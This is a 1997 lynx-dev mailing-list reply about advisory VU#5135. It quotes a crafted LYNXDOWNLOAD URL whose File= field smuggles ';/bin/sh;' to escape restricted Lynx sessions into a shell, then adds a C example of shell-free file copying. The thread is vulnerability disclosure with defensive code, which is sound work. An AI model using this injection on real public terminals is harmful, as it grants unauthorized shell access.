lynx-dev

Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)


From: H E Nelson
Subject: Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)
Date: Tue, 24 Jun 1997 23:09:10 +0900 (JST)

> subscribed to the raven list :)  So, here it is in case nobody's seen
> it yet.
> 
> Duncan Hill

Good work, Duncan!

> When you start up a lynx client session, you can hit "g" (for Goto) and
> then enter the following URL:
> 
>       URL to open: LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
>       Enter a filename: /dev/null
>       File exists. Overwrite? (y/n) y
> 
> This then gives a shell on the client machine on which the lynx process is
> executing.

On my pubLynx, it does appear that a shell was created.  Not only that, I
found that by using certain control keys (the terminal was initially locked
to regular keys), I could create any number of shells after that.  Who
knows how it could be exploited.

# ps -aux | grep lynx | grep -v grep
lynx      2493  0.0  3.3 3508 2868 pts/0    S 22:33:26  0:00 /usr/local/bin/lyn
lynx      2498  0.0  0.8  844  644 pts/0    S 22:34:51  0:00 sh -c /usr/bin/cp
lynx      2500  0.0  1.0 1168  856 pts/0    S 22:34:52  0:00 /bin/sh
lynx      2545  0.0  1.2 1300  972 pts/0    S 22:56:00  0:00 /bin/csh


> We would be interested in knowing whether this is a known problem.  The
> reporter suggested that disabling downloads would be an appropriate
> workaround.  If you are in agreement with this, is this a feature that is
> enabled by default?  (This would require the captive session to be started
> using the "-restrictions=download" option, wouldn't it?)

The "-restrictions=download" command line switch did not seem to prevent
someone from getting a shell on my setup.  I'll do more experimenting on
a machine not connected to the Net.

Needless to say, pubLynx is down until this problem is solved.  Sorry, folks.

__Henry
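
The `sh -c /usr/bin/cp` entry in the process listing above suggests the download file name reaches a shell inside a command string, which is why the `;` in `File=` matters. As an added illustration (not part of the original message and not Lynx's own code), the following C copies a file without involving a shell; `is_safe_path`, `copy_without_shell` and the `/bin/cp` location are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Reject names that carry shell syntax, start with '-', or contain "..".
   Allow-list (assumed policy): letters, digits, '.', '_', '-', '/'. */
int is_safe_path(const char *p)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-/";
    if (p == NULL || *p == '\0' || *p == '-')
        return 0;
    if (strstr(p, "..") != NULL)
        return 0;
    return p[strspn(p, ok)] == '\0';
}

/* Copy src to dst by exec'ing cp directly: each path is a single argv
   entry, so no shell parses it. Returns cp's exit status, or -1. */
int copy_without_shell(const char *src, const char *dst)
{
    pid_t pid;
    int status;

    if (!is_safe_path(src) || !is_safe_path(dst))
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "cp", "--", (char *)src, (char *)dst, NULL };
        execv("/bin/cp", argv);   /* assumed location of cp */
        _exit(127);               /* reached only if exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: the File= value from the report, then a plain name. */
    printf("%d\n", copy_without_shell("/dev/null;/bin/sh;", "/dev/null"));
    printf("%d\n", copy_without_shell("/dev/null", "/tmp/lynx_dl_example.out"));
    return 0;
}
```

Even without the allow-list, passing the path as one `argv` element means `;` is treated as part of a file name rather than as a command separator.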